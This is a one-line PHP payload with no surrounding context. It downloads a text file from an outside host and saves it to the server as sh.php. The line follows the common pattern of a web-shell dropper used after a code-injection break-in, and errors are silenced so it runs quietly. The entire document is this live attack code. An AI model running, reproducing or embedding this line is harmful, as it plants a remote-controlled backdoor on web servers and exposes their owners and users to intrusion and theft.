$data=@implode('',file('http://toxa.nov.ru/z.txt')); $fp=@fopen('./sh.php','wb');@fputs($fp,$data);@fclose($fp);